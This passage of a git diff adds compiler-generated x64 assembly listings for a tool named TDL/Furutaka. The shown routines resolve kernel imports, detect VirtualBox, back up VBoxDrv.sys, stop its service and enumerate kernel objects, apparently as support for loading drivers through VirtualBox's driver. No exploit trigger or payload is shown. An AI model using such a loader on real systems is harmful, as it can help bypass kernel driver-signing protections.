+ mov rbx, QWORD PTR [rsp+80]
+ mov rbp, QWORD PTR [rsp+88]
+ mov rsi, QWORD PTR [rsp+96]
+ add rsp, 32 ; 00000020H
+ pop r15
+ pop r14
+ pop r13
+ pop r12
+ pop rdi
+ ret 0
+TDLResolveKernelImport ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLGetProcAddress
+_TEXT SEGMENT
+cStr$ = 32
+KernelBase$ = 64
+KernelImage$ = 72
+FunctionName$ = 80
+pfn$ = 88
+TDLGetProcAddress PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 87
+$LN5:
+ mov QWORD PTR [rsp+8], rbx
+ push rdi
+ sub rsp, 48 ; 00000030H
+; Line 89
+ and QWORD PTR pfn$[rsp], 0
+ mov rbx, rdx
+ mov rdi, rcx
+; Line 91
+ mov rdx, r8
+ lea rcx, QWORD PTR cStr$[rsp]
+ call QWORD PTR __imp_RtlInitString
+; Line 92
+ lea r9, QWORD PTR pfn$[rsp]
+ xor r8d, r8d
+ lea rdx, QWORD PTR cStr$[rsp]
+ mov rcx, rbx
+ call QWORD PTR __imp_LdrGetProcedureAddress
+ test eax, eax
+ jns SHORT $LN2@TDLGetProc
+; Line 93
+ xor eax, eax
+ jmp SHORT $LN1@TDLGetProc
+$LN2@TDLGetProc:
+; Line 95
+ mov rax, QWORD PTR pfn$[rsp]
+ sub rax, rbx
+ add rax, rdi
+$LN1@TDLGetProc:
+; Line 96
+ mov rbx, QWORD PTR [rsp+64]
+ add rsp, 48 ; 00000030H
+ pop rdi
+ ret 0
+TDLGetProcAddress ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLVBoxInstalled
+_TEXT SEGMENT
+hKey$ = 64
+TDLVBoxInstalled PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 57
+$LN5:
+ push rbx
+ sub rsp, 48 ; 00000030H
+; Line 60
+ and QWORD PTR hKey$[rsp], 0
+; Line 62
+ lea rax, QWORD PTR hKey$[rsp]
+ mov r9d, 131097 ; 00020019H
+ mov QWORD PTR [rsp+32], rax
+ xor r8d, r8d
+ lea rdx, OFFSET FLAT:??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@
+ mov rcx, -2147483646 ; ffffffff80000002H
+ call QWORD PTR __imp_RegOpenKeyExW
+; Line 65
+ mov rcx, QWORD PTR hKey$[rsp]
+ xor ebx, ebx
+ test rcx, rcx
+ setne bl
+; Line 67
+ test rcx, rcx
+ je SHORT $LN2@TDLVBoxIns
+; Line 68
+ call QWORD PTR __imp_RegCloseKey
+$LN2@TDLVBoxIns:
+; Line 71
+ mov eax, ebx
+; Line 72
+ add rsp, 48 ; 00000030H
+ pop rbx
+ ret 0
+TDLVBoxInstalled ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/sup.asm b/Source/Furutaka/output/x64/Release/asmlist/sup.asm
new file mode 100644
index 0000000..3ff0c75
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/sup.asm
@@ -0,0 +1,1502 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC supGetNtOsBase
+PUBLIC supGetSystemInfo
+PUBLIC supQueryResourceData
+PUBLIC supBackupVBoxDrv
+PUBLIC supWriteBufferToFile
+PUBLIC supIsObjectExists
+PUBLIC supStopVBoxService
+PUBLIC supDetectObjectCallback
+PUBLIC supEnumSystemObjects
+PUBLIC supxStopServiceShowError
+PUBLIC ??_C@_1BE@HOKNBJFH@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2@ ; `string'
+PUBLIC ??_C@_1BO@PJIGFGPE@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAb?$AAa?$AAc?$AAk?$AAu?$AAp@ ; `string'
+PUBLIC ??_C@_1BI@MANNKNNC@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAs?$AAy?$AAs@ ; `string'
+PUBLIC ??_C@_1M@NAJFBAG@?$AAS?$AAC?$AAM?$AA?3?$AA?5@ ; `string'
+PUBLIC ??_C@_1BE@JKNOOOMI@?$AA?5?$AAf?$AAa?$AAi?$AAl?$AAe?$AAd?$AA?5?$AA?$CI@ ; `string'
+PUBLIC ??_C@_13DIBMAFH@?$AA?$CJ@ ; `string'
+PUBLIC ??_C@_1CM@OCPAABHF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAA?$AAt?$AAt?$AAe?$AAm?$AAp?$AAt?$AA?5?$AAt?$AAo@ ; `string'
+PUBLIC ??_C@_1EE@PHBHNLM@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAd?$AAo@ ; `string'
+PUBLIC ??_C@_1BI@BPEMHDAO@?$AAO?$AAp?$AAe?$AAn?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@ ; `string'
+PUBLIC ??_C@_1CK@IBJMKCMP@?$AAQ?$AAu?$AAe?$AAr?$AAy?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AAS?$AAt?$AAa@ ; `string'
+PUBLIC ??_C@_1EA@ONGKHKHC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAi?$AAs@ ; `string'
+PUBLIC ??_C@_1DK@FIJGIPBO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ ; `string'
+PUBLIC ??_C@_1EE@CLBBMPNC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ ; `string'
+PUBLIC ??_C@_1DM@KJCMNIP@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ ; `string'
+PUBLIC ??_C@_1BO@OEEIJKOC@?$AAC?$AAo?$AAn?$AAt?$AAr?$AAo?$AAl?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@ ; `string'
+PUBLIC ??_C@_1CI@BLLFIFDA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAW?$AAa?$AAi?$AAt?$AA?5?$AAt?$AAi?$AAm?$AAe?$AAd@ ; `string'
+EXTRN __imp_GetFileAttributesW:PROC
+EXTRN __imp_GetLastError:PROC
+EXTRN __imp_Sleep:PROC
+EXTRN __imp_GetTickCount:PROC
+EXTRN __imp_GetSystemDirectoryW:PROC
+EXTRN __imp_MoveFileExW:PROC
+EXTRN __imp_CloseServiceHandle:PROC
+EXTRN __imp_ControlService:PROC
+EXTRN __imp_OpenServiceW:PROC
+EXTRN __imp_QueryServiceStatusEx:PROC
+EXTRN __imp_LdrAccessResource:PROC
+EXTRN __imp_LdrFindResource_U:PROC
+EXTRN __imp_RtlInitUnicodeString:PROC
+EXTRN __imp_RtlFreeUnicodeString:PROC
+EXTRN __imp_RtlDosPathNameToNtPathName_U:PROC
+EXTRN __imp_RtlAllocateHeap:PROC
+EXTRN __imp_RtlFreeHeap:PROC
+EXTRN __imp_NtQuerySystemInformation:PROC
+EXTRN __imp_NtClose:PROC
+EXTRN __imp_NtOpenDirectoryObject:PROC
+EXTRN __imp_NtQueryDirectoryObject:PROC
+EXTRN __imp_NtCreateFile:PROC
+EXTRN __imp_NtWriteFile:PROC
+EXTRN __imp_NtFlushBuffersFile:PROC
+EXTRN _strend_w:PROC
+EXTRN _strcpy_w:PROC
+EXTRN _strcat_w:PROC
+EXTRN _strlen_w:PROC
+EXTRN _strcmpi_w:PROC
+EXTRN ultostr_w:PROC
+EXTRN cuiPrintTextW:PROC
+EXTRN __C_specific_handler:PROC
+; COMDAT pdata
+pdata SEGMENT
+$pdata$RtlSecureZeroMemory DD imagerel $LN4
+ DD imagerel $LN4+27
+ DD imagerel $unwind$RtlSecureZeroMemory
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supGetNtOsBase DD imagerel $LN9
+ DD imagerel $LN9+62
+ DD imagerel $unwind$supGetNtOsBase
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supGetSystemInfo DD imagerel $LN22
+ DD imagerel $LN22+166
+ DD imagerel $unwind$supGetSystemInfo
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supQueryResourceData DD imagerel $LN9
+ DD imagerel $LN9+137
+ DD imagerel $unwind$supQueryResourceData
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supBackupVBoxDrv DD imagerel $LN9
+ DD imagerel $LN9+256
+ DD imagerel $unwind$supBackupVBoxDrv
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supWriteBufferToFile DD imagerel $LN33
+ DD imagerel $LN33+682
+ DD imagerel $unwind$supWriteBufferToFile
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supWriteBufferToFile$fin$0 DD imagerel supWriteBufferToFile$fin$0
+ DD imagerel supWriteBufferToFile$fin$0+75
+ DD imagerel $unwind$supWriteBufferToFile$fin$0
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supIsObjectExists DD imagerel $LN5
+ DD imagerel $LN5+68
+ DD imagerel $unwind$supIsObjectExists
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supStopVBoxService DD imagerel $LN42
+ DD imagerel $LN42+622
+ DD imagerel $unwind$supStopVBoxService
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supDetectObjectCallback DD imagerel $LN10
+ DD imagerel $LN10+78
+ DD imagerel $unwind$supDetectObjectCallback
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supEnumSystemObjects DD imagerel $LN49
+ DD imagerel $LN49+513
+ DD imagerel $unwind$supEnumSystemObjects
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$supxStopServiceShowError DD imagerel $LN4
+ DD imagerel $LN4+134
+ DD imagerel $unwind$supxStopServiceShowError
+pdata ENDS
+; COMDAT ??_C@_1CI@BLLFIFDA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAW?$AAa?$AAi?$AAt?$AA?5?$AAt?$AAi?$AAm?$AAe?$AAd@
+CONST SEGMENT
+??_C@_1CI@BLLFIFDA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAW?$AAa?$AAi?$AAt?$AA?5?$AAt?$AAi?$AAm?$AAe?$AAd@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'a', 00H
+ DB 'i', 00H, 't', 00H, ' ', 00H, 't', 00H, 'i', 00H, 'm', 00H, 'e'
+ DB 00H, 'd', 00H, ' ', 00H, 'o', 00H, 'u', 00H, 't', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BO@OEEIJKOC@?$AAC?$AAo?$AAn?$AAt?$AAr?$AAo?$AAl?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@
+CONST SEGMENT
+??_C@_1BO@OEEIJKOC@?$AAC?$AAo?$AAn?$AAt?$AAr?$AAo?$AAl?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@ DB 'C'
+ DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'r', 00H, 'o', 00H, 'l', 00H
+ DB 'S', 00H, 'e', 00H, 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e'
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DM@KJCMNIP@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+CONST SEGMENT
+??_C@_1DM@KJCMNIP@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 's'
+ DB 00H, 't', 00H, 'o', 00H, 'p', 00H, ' ', 00H, 't', 00H, 'i', 00H
+ DB 'm', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'o', 00H, 'u', 00H, 't'
+ DB 00H, '.', 00H, 0aH, 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EE@CLBBMPNC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+CONST SEGMENT
+??_C@_1EE@CLBBMPNC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 's'
+ DB 00H, 't', 00H, 'o', 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H
+ DB ' ', 00H, 's', 00H, 'u', 00H, 'c', 00H, 'c', 00H, 'e', 00H, 's'
+ DB 00H, 's', 00H, 'f', 00H, 'u', 00H, 'l', 00H, 'l', 00H, 'y', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DK@FIJGIPBO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@
+CONST SEGMENT
+??_C@_1DK@FIJGIPBO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAs?$AAt@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 's'
+ DB 00H, 't', 00H, 'o', 00H, 'p', 00H, ' ', 00H, 'p', 00H, 'e', 00H
+ DB 'n', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, '.', 00H, '.'
+ DB 00H, '.', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EA@ONGKHKHC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAi?$AAs@
+CONST SEGMENT
+??_C@_1EA@ONGKHKHC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAi?$AAs@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'i'
+ DB 00H, 's', 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'r', 00H, 'e', 00H
+ DB 'a', 00H, 'd', 00H, 'y', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o'
+ DB 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CK@IBJMKCMP@?$AAQ?$AAu?$AAe?$AAr?$AAy?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AAS?$AAt?$AAa@
+CONST SEGMENT
+??_C@_1CK@IBJMKCMP@?$AAQ?$AAu?$AAe?$AAr?$AAy?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AAS?$AAt?$AAa@ DB 'Q'
+ DB 00H, 'u', 00H, 'e', 00H, 'r', 00H, 'y', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 'S', 00H, 't'
+ DB 00H, 'a', 00H, 't', 00H, 'u', 00H, 's', 00H, 'E', 00H, 'x', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BI@BPEMHDAO@?$AAO?$AAp?$AAe?$AAn?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@
+CONST SEGMENT
+??_C@_1BI@BPEMHDAO@?$AAO?$AAp?$AAe?$AAn?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe@ DB 'O'
+ DB 00H, 'p', 00H, 'e', 00H, 'n', 00H, 'S', 00H, 'e', 00H, 'r', 00H
+ DB 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EE@PHBHNLM@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAd?$AAo@
+CONST SEGMENT
+??_C@_1EE@PHBHNLM@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAS?$AAe?$AAr?$AAv?$AAi?$AAc?$AAe?$AA?5?$AAd?$AAo@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'e', 00H
+ DB 'r', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'd'
+ DB 00H, 'o', 00H, 'e', 00H, 's', 00H, ' ', 00H, 'n', 00H, 'o', 00H
+ DB 't', 00H, ' ', 00H, 'e', 00H, 'x', 00H, 'i', 00H, 's', 00H, 't'
+ DB 00H, ',', 00H, ' ', 00H, 's', 00H, 'k', 00H, 'i', 00H, 'p', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1CM@OCPAABHF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAA?$AAt?$AAt?$AAe?$AAm?$AAp?$AAt?$AA?5?$AAt?$AAo@
+CONST SEGMENT
+??_C@_1CM@OCPAABHF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAA?$AAt?$AAt?$AAe?$AAm?$AAp?$AAt?$AA?5?$AAt?$AAo@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'A', 00H, 't', 00H
+ DB 't', 00H, 'e', 00H, 'm', 00H, 'p', 00H, 't', 00H, ' ', 00H, 't'
+ DB 00H, 'o', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o', 00H, 'p', 00H
+ DB ' ', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_13DIBMAFH@?$AA?$CJ@
+CONST SEGMENT
+??_C@_13DIBMAFH@?$AA?$CJ@ DB ')', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BE@JKNOOOMI@?$AA?5?$AAf?$AAa?$AAi?$AAl?$AAe?$AAd?$AA?5?$AA?$CI@
+CONST SEGMENT
+??_C@_1BE@JKNOOOMI@?$AA?5?$AAf?$AAa?$AAi?$AAl?$AAe?$AAd?$AA?5?$AA?$CI@ DB ' '
+ DB 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H
+ DB ' ', 00H, '(', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1M@NAJFBAG@?$AAS?$AAC?$AAM?$AA?3?$AA?5@
+CONST SEGMENT
+??_C@_1M@NAJFBAG@?$AAS?$AAC?$AAM?$AA?3?$AA?5@ DB 'S', 00H, 'C', 00H, 'M', 00H
+ DB ':', 00H, ' ', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BI@MANNKNNC@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAs?$AAy?$AAs@
+CONST SEGMENT
+??_C@_1BI@MANNKNNC@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAs?$AAy?$AAs@ DB 'V'
+ DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H
+ DB '.', 00H, 's', 00H, 'y', 00H, 's', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BO@PJIGFGPE@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAb?$AAa?$AAc?$AAk?$AAu?$AAp@
+CONST SEGMENT
+??_C@_1BO@PJIGFGPE@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv?$AA?4?$AAb?$AAa?$AAc?$AAk?$AAu?$AAp@ DB 'V'
+ DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H
+ DB '.', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p'
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BE@HOKNBJFH@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2@
+CONST SEGMENT
+??_C@_1BE@HOKNBJFH@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2@ DB '\'
+ DB 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
+ DB 's', 00H, '\', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supxStopServiceShowError DD 050d01H
+ DD 052340dH
+ DD 050010dH
+ DD 07006H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supEnumSystemObjects DD 071209H
+ DD 0176412H
+ DD 0163412H
+ DD 0140112H
+ DD 0700bH
+ DD imagerel __C_specific_handler
+ DD 01H
+ DD imagerel $LN49+48
+ DD imagerel $LN49+480
+ DD 01H
+ DD imagerel $LN49+480
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supDetectObjectCallback DD 010401H
+ DD 04204H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supStopVBoxService DD 0b2101H
+ DD 0956421H
+ DD 0943421H
+ DD 08e0121H
+ DD 0e010f012H
+ DD 0700cc00eH
+ DD 0500bH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supIsObjectExists DD 020601H
+ DD 030025206H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supWriteBufferToFile$fin$0 DD 020601H
+ DD 05002b206H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supWriteBufferToFile DD 0b1f11H
+ DD 022641fH
+ DD 020341fH
+ DD 01a011fH
+ DD 0e016f018H
+ DD 0c012d014H
+ DD 07010H
+ DD imagerel __C_specific_handler
+ DD 01H
+ DD imagerel $LN33+192
+ DD imagerel $LN33+617
+ DD imagerel supWriteBufferToFile$fin$0
+ DD 00H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supBackupVBoxDrv DD 071a01H
+ DD 018d741aH
+ DD 018c341aH
+ DD 018a011aH
+ DD 0500bH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supQueryResourceData DD 061201H
+ DD 0c7412H
+ DD 0a3412H
+ DD 0500b7212H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supGetSystemInfo DD 081201H
+ DD 0a5412H
+ DD 083412H
+ DD 0e00e3212H
+ DD 0600b700cH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$supGetNtOsBase DD 020601H
+ DD 030023206H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$RtlSecureZeroMemory DD 020501H
+ DD 017405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT supxStopServiceShowError
+_TEXT SEGMENT
+szMessage$ = 32
+Function$ = 656
+ErrorCode$ = 664
+supxStopServiceShowError PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 435
+$LN4:
+ mov QWORD PTR [rsp+8], rbx
+ push rdi
+ sub rsp, 640 ; 00000280H
+ mov edi, edx
+ mov rbx, rcx
+; Line 438
+ lea rdx, OFFSET FLAT:??_C@_1M@NAJFBAG@?$AAS?$AAC?$AAM?$AA?3?$AA?5@
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcpy_w
+; Line 439
+ mov rdx, rbx
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcat_w
+; Line 440
+ lea rdx, OFFSET FLAT:??_C@_1BE@JKNOOOMI@?$AA?5?$AAf?$AAa?$AAi?$AAl?$AAe?$AAd?$AA?5?$AA?$CI@
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcat_w
+; Line 441
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strend_w
+ mov rdx, rax
+ mov ecx, edi
+ call ultostr_w
+; Line 442
+ lea rdx, OFFSET FLAT:??_C@_13DIBMAFH@?$AA?$CJ@
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call _strcat_w
+; Line 443
+ mov edx, 1
+ lea rcx, QWORD PTR szMessage$[rsp]
+ call cuiPrintTextW
+; Line 444
+ mov rbx, QWORD PTR [rsp+656]
+ add rsp, 640 ; 00000280H
+ pop rdi
+ ret 0
+supxStopServiceShowError ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supEnumSystemObjects
+_TEXT SEGMENT
+status$ = 64
+ctx$ = 68
+hDirectory$ = 72
+CallbackStatus$ = 80
+objinf$ = 88
+sname$ = 96
+attr$ = 112
+pwszRootDirectory$ = 176
+hRootDirectory$ = 184
+rlen$ = 192
+CallbackProc$ = 192
+CallbackParam$ = 200
+supEnumSystemObjects PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 321
+$LN49:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ push rdi
+ sub rsp, 160 ; 000000a0H
+ mov rsi, r9
+ mov rbx, r8
+ mov r10, rcx
+; Line 324
+ and QWORD PTR hDirectory$[rsp], 0
+; Line 332
+ test r8, r8
+ jne SHORT $LN5@supEnumSys
+; Line 333
+ mov eax, -1073741582 ; ffffffffc00000f2H
+ jmp $LN1@supEnumSys
+$LN5@supEnumSys:
+; Line 341
+ test r10, r10
+ je SHORT $LN7@supEnumSys
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR sname$[rsp]
+ xor eax, eax
+ lea ecx, QWORD PTR [rax+16]
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 343
+ mov rdx, r10
+ lea rcx, QWORD PTR sname$[rsp]
+ call QWORD PTR __imp_RtlInitUnicodeString
+; Line 344
+ mov DWORD PTR attr$[rsp], 48 ; 00000030H
+ and QWORD PTR attr$[rsp+8], 0
+ mov DWORD PTR attr$[rsp+24], 64 ; 00000040H
+ lea rax, QWORD PTR sname$[rsp]
+ mov QWORD PTR attr$[rsp+16], rax
+ xorps xmm0, xmm0
+ movdqu XMMWORD PTR attr$[rsp+32], xmm0
+; Line 345
+ lea r8, QWORD PTR attr$[rsp]
+ mov edx, 1
+ lea rcx, QWORD PTR hDirectory$[rsp]
+ call QWORD PTR __imp_NtOpenDirectoryObject
+ mov DWORD PTR status$[rsp], eax
+; Line 346
+ test eax, eax
+ jns SHORT $LN8@supEnumSys
+; Line 347
+ jmp $LN1@supEnumSys
+$LN7@supEnumSys:
+; Line 351
+ test rdx, rdx
+ jne SHORT $LN10@supEnumSys
+; Line 352
+ mov eax, -1073741584 ; ffffffffc00000f0H
+ jmp $LN1@supEnumSys
+$LN10@supEnumSys:
+; Line 354
+ mov QWORD PTR hDirectory$[rsp], rdx
+$LN8@supEnumSys:
+; Line 358
+ and DWORD PTR ctx$[rsp], 0
+$LL4@supEnumSys:
+; Line 361
+ and DWORD PTR rlen$[rsp], 0
+; Line 362
+ lea rax, QWORD PTR rlen$[rsp]
+ mov QWORD PTR [rsp+48], rax
+ lea rax, QWORD PTR ctx$[rsp]
+ mov QWORD PTR [rsp+40], rax
+ mov BYTE PTR [rsp+32], 0
+ mov r9b, 1
+ xor r8d, r8d
+ xor edx, edx
+ mov rcx, QWORD PTR hDirectory$[rsp]
+ call QWORD PTR __imp_NtQueryDirectoryObject
+ mov DWORD PTR status$[rsp], eax
+; Line 363
+ cmp eax, -1073741789 ; ffffffffc0000023H
+ jne $LN3@supEnumSys
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 22853
+ mov rax, QWORD PTR gs:48
+; File J:\Workspace\drivers\TDL\Source\Furutaka\ntos.h
+; Line 5120
+ mov rcx, QWORD PTR [rax+96]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 366
